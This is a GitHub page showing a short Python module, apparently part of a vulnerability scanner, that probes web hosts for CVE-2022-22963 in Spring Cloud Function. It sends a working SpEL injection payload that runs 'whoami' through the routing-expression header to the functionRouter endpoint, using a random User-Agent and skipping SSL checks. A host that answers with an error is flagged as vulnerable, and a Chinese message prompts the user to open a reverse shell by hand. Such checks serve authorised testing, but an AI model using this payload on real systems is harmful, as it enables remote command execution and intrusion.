-
Notifications
You must be signed in to change notification settings - Fork 59
/
CVE_2022_22963_Async.py
51 lines (45 loc) · 1.87 KB
/
CVE_2022_22963_Async.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# coding:utf-8
import aiohttp
from util import RandomUA
class CVE_2022_22963_Async:
def __init__(self):
ua = RandomUA.RandomUA()
self.ua = ua.UserAgent()
self.payload = f'T(java.lang.Runtime).getRuntime().exec("whoami")'
self.data = 'test'
self.header = {
'spring.cloud.function.routing-expression': self.payload,
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': self.ua,
'Content-Type': 'application/x-www-form-urlencoded'
}
self.path = 'functionRouter'
async def fetch(self, session, url, headers, data, proxies):
try:
async with session.post(url=url, headers=headers, data=data, verify_ssl=False, proxies=proxies, timeout=6) as response:
return await response.text(), response.status
except Exception as e:
return str(e), 0
async def poc(self, url, proxies, ProxyStute):
if ProxyStute == 1:
proxy = proxies
else:
proxy = None
try:
self.url = url + self.path
async with aiohttp.ClientSession() as session:
text, code = await self.fetch(session, self.url, self.header, self.data, proxy)
rsp = '"error":"Internal Server Error"'
if code == 500 and rsp in text:
result = f'[+] {url} 存在编号为CVE-2022-22963的RCE漏洞,请手动反弹Shell'
return result
else:
result = f'[-] {url} CVE-2022-22963漏洞不存在'
return result
except Exception as e:
error = f"[error] {url} 未知错误 {e}"
return error
async def exp(self, url, proxies, ProxyStute):
pass